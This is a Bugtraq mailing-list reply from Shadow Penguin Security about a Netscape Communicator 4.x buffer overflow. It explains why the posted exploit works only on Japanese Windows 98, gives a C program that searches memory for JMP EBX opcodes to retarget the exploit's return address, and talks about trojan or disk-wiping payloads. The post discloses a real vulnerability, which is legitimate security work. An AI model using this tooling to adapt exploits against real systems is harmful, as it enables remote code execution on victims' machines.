Subject:      Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow
To: BUGTRAQ@SECURITYFOCUS.COM 


Hello


David Parker　writes:


> I tried the 4 exploit test links, and they all crashed Netscape but
> didn't cause any bluescreens or run any programs. I have win98,
> Netscape 4.5 128-bit, and the same msvcrt.dll (6.00.8397). I'm not
> sure how to debug the crashes, so I'm including the illegal operation
> errors, hopefully they will be of some help:


We could confirm that the exploit codes which were published at the demo
site were executed. We think that the reason you can not confirm the
executed the exploit codes is based on the difference of the Windows
kernel code. The exploit code which is posted by R00tZer0 is for
Japanese Windows98, this exploit uses the codes which is written in
0xbff7a06b. In case Japanese Windows98, JMP EBX(FFH,E3H) code is written
in such address. If you remake the exploit code that can exploit the
specified netscape communicators, you have to change the address which
is specified in the exploit code. We don't have the environment of the
English Windows, we could not code for English Windows. Maybe, you will
be able to get the address of JMP EBX code by the following program. So,
if someone succeeded or could get the address which is written the JMP
EBX code, please tell us the address of JMP EBX code.


#include <windows.h>
#include <stdio.h>


unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};


void search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;


    fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed);
    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2)
            fprintf(fp,"%x : %x %x %x %x\n",p,*p&255,*(p+1)&255,*(p+2)&255,*(p+3)&255);
}
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance,
                      LPTSTR lpCmdLine, int nCmdShow)
{
    FILE            *fp;
    int             i;



    if ((fp=fopen("adr.txt","w"))!=NULL){
        for (i=0;;i+=2){
            if (mems[i]==0) break;
            search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],0xff,0xe3);
        }
        fclose(fp);
    }
    return 0;
}



Kerb　writes:


>  When I went there with NC 4.05, it gave me a blue screen of death that was
> completely unrecoverable.  I had to reboot the system.
> So, basically, it is a DoS for Netscape users, could possibly be coded
> into a CGI or Javascript that checks browser
> version and writes the corresponding exploit code.   Just a thought.


The CGIs which are published at the demo site are not for DoS attack. Of
course, we could develop the codes for the DoS attack. We also could
develop the HDD format code, virus code, trojan code, and so on. If the
trojan code is written in the exploit code, the all visitors'  PC will
be cracked, and if the hdd format code is written, the visitors' HDD
will be cleaned completely. It's very serious problem. In this case, the
stack area that can be used for exploit code is wide enough.


I will post the demo programs which can send the trojan by using the
security hole on other applications.



-----
 The Shadow Penguin Security (http://shadowpenguin.backsection.net)
 Webmaster / UNYUN (shadowpenguin@backsection.net)